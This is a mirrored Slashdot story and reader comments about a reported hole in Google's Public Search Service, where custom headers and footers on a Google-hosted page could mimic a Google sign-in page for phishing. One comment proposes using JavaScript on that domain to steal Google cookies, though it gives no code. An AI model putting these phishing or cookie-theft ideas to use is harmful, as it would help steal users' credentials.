Slashdot Mirror

← Back to Stories (view on slashdot.org)

Google Public Service Search Makes for Easy Phishing

Posted by ryuzaki0 on from the watch-where-you-search dept.

lisah writes "According to reports at NewsForge this morning, Developer Eric Farraro has discovered a potential hole in Google's Public Search Service that may leave the door wide open for phishing scams. The Public Search Service, designed to allow universities and other non-profit institutions to add Google search capabilities to their websites, provides code that allows website developers to customize the header and footer of the search results page. Handy (and malicious) coders can manipulate the headers and footers to create what looks like a Google sign-in page and then collect the login names and passwords of unsuspecting users." NewsForge and Slashdot are both owned by OSTG.

7 of 40 comments (clear)

  1. Any major web service has this non-issue by mounthood · · Score: 2, Insightful

    If you make a Yahoo! Store that looks like Yahoo mail ... or an MSN page that looks like hotmail ...

    --
    tomorrow who's gonna fuss
  2. Try the address.... by dontbflat · · Score: 3, Insightful

    And you find that the google www.google.com/u/gplus doesnt work now. I'll say one thing. They sure are quick. Now they should just put those search results in an IFRAME that you cant change like the adsense code.

    People always are looking for new ways to get user/pass from unsuspecting users. The internet is used to hurt the ignorant. I just hope I wont fall into such a good looking trap.

  3. Re:Not a google issue... by dontbflat · · Score: 5, Insightful

    Its google's issue because they are HOSTING it. If they werent hosting the code, then fine. But they are and thats where the problem lies.

  4. Re:Not a google issue... by Infinityis · · Score: 4, Insightful

    The problem is that usually people can type in the URL from a suspicious looking email and prevent phishing attacks. In this case, typing in the URL took to you precisely the same site. All the anti-phishing advice you've been giving your family and friends would prove useless under these circumstances.

  5. Screw up of Google by mapkinase · · Score: 4, Insightful

    This is very Google-specific screw-up. It is not like they forgot to change some default setting, it is a specifically designed feature that went wrong.

    Google certainly does not do evil, but it is not exactly catching in the rye.

    --
    I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
  6. Bad habits by thesandtiger · · Score: 1, Insightful

    Generally, unless I have specifically typed in a URL I know is safe, I will at the very least check the address bar of my browser before signing in to something. That means that any time there's a link to something - even from a source that I trust - I will check to make sure I am where I think I am. Of course, I'm slightly paranoid, and I would expect that the average user doesn't do this kind of thing. It's kind of like the "secure" commerce sites - how many people actually check for the little lock/key thingy? Probably most on /., but in the real world it seems like a shiny website with stuff mainly spelled correctly is good enough for most.

    And speaking of laziness.... Why is it that the only "editorial" behavior /. editors do is the "full-disclosure" thing with stories that are somehow associated with /. or their masters?

    It's like "Oh, we won't bother ensuring that something's not a dupe, and we won't bother to spell, grammar or fact check submissions - but hey, we can sure look all editorly if we just do that disclosure thingy! LOOKIT ME!!! I CAINT SPEL EDITIR, BUT I ARE WON!!!!"

    Sorry. (And good-bye, karma!)

    --
    Since I can't tell them apart, I treat all ACs as the same person.
  7. What about using js to grab cookies? by mbannonb · · Score: 2, Insightful

    Instead of using javascript to create a modified form, why not use javascript to grab the user's google cookies and send them to yourself while on the google.com domain?